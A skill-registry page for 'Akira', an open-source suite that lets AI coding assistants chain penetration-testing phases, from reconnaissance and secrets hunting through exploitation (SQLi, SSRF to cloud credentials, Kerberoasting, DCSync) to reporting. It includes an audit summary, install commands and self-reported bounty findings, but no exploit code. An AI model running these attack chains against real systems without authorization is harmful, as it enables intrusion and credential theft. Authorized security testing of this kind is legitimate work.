Skillget

akira

skill
Security Audit
Warn
Health Warn
  • License — License: MIT
  • Description — Repository has a description
  • Active repo — Last push 0 days ago
  • Low visibility — Only 9 GitHub stars
Code Pass
  • Code scan — Scanned 12 files during light audit, no dangerous patterns found
Permissions Pass
  • Permissions — No dangerous permissions requested
Purpose
This is an offensive security skill suite designed to run natively inside AI coding assistants like Claude Code. It chains together multiple attack phases—ranging from initial reconnaissance to vulnerability exploitation and reporting—acting as an automated AI co-pilot for penetration testing.

Security Assessment
Risk: Medium. By design, this tool requires the execution of shell commands and makes active network requests to scan and exploit external targets. While the automated code scan passed with no dangerous patterns, hidden obfuscation can be difficult to detect in shell scripts. Furthermore, the installation process (`bash install.sh && bash bootstrap.sh`) automatically downloads and sets up third-party security tools (like sqlmap and nuclei). Executing arbitrary scripts to install external software always introduces a supply chain risk. No hardcoded secrets were found, but because it is designed to hunt for sensitive data and interact with live targets, users must be careful not to inadvertently expose their own environments.

Quality Assessment
The project is very new, which explains the low community visibility (only 9 GitHub stars). However, it is licensed under the standard MIT license and appears to be actively maintained, with recent updates pushed. Community trust is currently limited due to the small user base, making it a relatively untested tool in real-world, widespread deployment.

Verdict
Use with caution: the code itself lacks malicious patterns, but automatically running third-party shell scripts designed for active network exploitation carries inherent risks that require manual review and strict environment isolation.
SUMMARY

Open-source PentestGPT & HexStrike alternative. Phase-chained AI pentest co-pilot with 12 attack skills, real CVE proof, and zero hallucinations. Runs in Claude Code, Gemini CLI, Cursor.

README.md

What Is Akira?

A complete offensive security skill suite that runs natively inside your AI coding environment - Claude Code, Gemini CLI, Cursor, Codex, or any agent.

No server. No 40-tool pre-install hell. No hallucinated findings. Every finding requires direct HTTP evidence. No proof = no finding.

/plan-engagement → /recon → /secrets → /exploit → /zerodayhunt → /triage → /report

Install

git clone https://github.com/Kalp1774/akira
cd akira && bash install.sh

To also install tools (nuclei, dalfox, subfinder, httpx, sqlmap...):

bash install.sh && bash bootstrap.sh

Open Claude Code, type /plan-engagement target.com, and go.

Full installation guide and platform setup in the Wiki - Installation.

Skills

Full technique details and examples in the Wiki - Skills.

Core 7-Phase Lifecycle

Skill Phase What It Does
/plan-engagement 0 Scope definition, PTT generation, session.json init
/recon 1 Subdomains, live hosts, ports, URLs, tech stack fingerprint
/secrets 2 API keys, tokens, credentials in JS/source/git/Postman
/exploit 3 XSS, SQLi, nuclei, deserialization, SSTI, XXE, NoSQLi
/zerodayhunt 3+ JWT confusion, SSRF->IAM, WAF bypass, type juggling
/triage 4 Severity clustering, confidence scoring (0-100), FP gate
/report 5 Pentest report or HackerOne/Bugcrowd submission format

Specialized Attack Modules

Full attack technique walkthroughs in the Wiki - Attack Techniques.

Skill What It Does
/ad-attacks BloodHound, Kerberoasting, DCSync, Golden/Silver Ticket, ADCS ESC1-8
/oauth-attacks Redirect URI bypass, CSRF, PKCE downgrade, JWT confusion
/race-conditions HTTP/2 single-packet attack, coupon reuse, double-spend, OTP bypass
/cloud-audit AWS SSRF->IAM, S3 enum, GCP, Azure, K8s unauthenticated API
/ctf HackTheBox/TryHackMe - web/crypto/pwn/RE/forensics/OSINT/stego

Proof It Works

Real anonymized findings made with Akira. Full writeups in FINDINGS.md.

# Type Severity Bounty Skill Chain
1 SSRF → AWS IAM Credential Extraction Critical $2,500 /recon/exploit/cloud-audit
2 OAuth Open Redirect → Auth Code Interception Critical $1,800 /recon/oauth-attacks
3 Race Condition: Coupon Applied 7x High $800 /race-conditions
4 Strapi SSRF Bypass + MIME Fail-Open (CVE filed) Critical - /zerodayhunt
5 JWT RS256→HS256 Confusion → Admin Access Critical $1,500 /zerodayhunt

Why Not PentestGPT?

Capability PentestGPT HexStrike Akira
Full 6-phase engagement lifecycle Partial - YES
Phase artifact handoffs (session.json) - - YES
Anti-hallucination evidence gate - - YES
Confidence scoring per finding (0-100) - - YES
AD full chain (BloodHound → DCSync) - Partial YES
OAuth/OIDC exploitation suite - - YES
Race conditions (single-packet attack) - - YES
Cloud audit (AWS + GCP + Azure + K8s) - Partial YES
CTF mode (HackTheBox, TryHackMe) YES - YES
Native in Claude Code, Gemini, Cursor Partial - YES
Free + MIT YES Partial YES

Roadmap

See the full roadmap in the Wiki.

Release ETA New Skills
Hydra v1.0.0 Shipped 12 core skills
Basilisk v1.1.0 Month 2 graphql, deserialization, prototype-pollution, supply-chain, ci-cd-audit
Raven v1.2.0 Month 3 Akira Context Engine, cache-attacks, csp-bypass
Phantom v1.3.0 Month 4 mobile, burp-integration
Leviathan v2.0.0 Month 6 Akira Brain, postmap-recon, red-team

Contributing

Found a technique that belongs in Akira? Fix a skill bug? Submit a real finding?

See CONTRIBUTING.md and the Wiki - Contributing - PRs welcome, fast review.

Legal

For authorized security testing only - bug bounty programs, systems you own, CTF competitions.

Unauthorized testing is illegal. Authors not responsible for misuse.

Built for bug hunters, by bug hunters.

Star this repo to stay updated when new skills ship.

Reviews (0)

No results found